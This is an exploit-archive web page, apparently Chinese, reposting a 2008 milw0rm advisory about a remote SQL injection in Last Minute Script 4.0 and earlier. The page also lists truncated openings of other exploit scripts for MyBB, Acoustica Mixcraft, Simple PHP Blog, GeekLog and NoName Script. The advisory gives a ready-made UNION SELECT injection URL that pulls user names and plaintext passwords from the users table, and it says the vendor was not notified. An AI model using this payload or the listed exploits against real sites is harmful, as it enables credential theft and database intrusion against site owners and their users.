建站极客
网络安全 Exploit 正文
Mole Group Last Minute Script
所属分类:
网络安全 / Exploit
阅读数:
92
收藏 0
赞 0
分享
-[*] ================================================================================ [*]-
-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-
-[*] ================================================================================ [*]-
[*] Discovered By: t0pP8uZz
[*] Discovered On: 8 JULY 2008
[*] Script Download: http://www.mole-group.com/content/view/31/45/
[*] DORK: N/A
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,
This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access
to confidential information.
below is a example.
[*] SQL Injection:
http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*
[*] NOTE/TIP:
passwords are in plaintext.
There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.
[*] GREETZ:
milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
[-] Peace...
...t0pP8uZz !
-[*] ================================================================================ [*]-
-[*] Last Minute Script <= 4.0 Remote SQL Injection Vulnerability [*]-
-[*] ================================================================================ [*]-
# milw0rm.com [2008-07-08]
MyBulletinBoard (MyBB) <?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
评论 0
收藏 0
赞 0
分享
Acoustica Mixcraft #!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
评论 0
收藏 0
赞 0
分享
Simple PHP Blog (SPHPBlog) <?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
评论 0
收藏 0
赞 0
分享
GeekLog #!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
评论 0
收藏 0
赞 0
分享
NoName Script ################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
评论 0
收藏 0
赞 0
分享
查看更多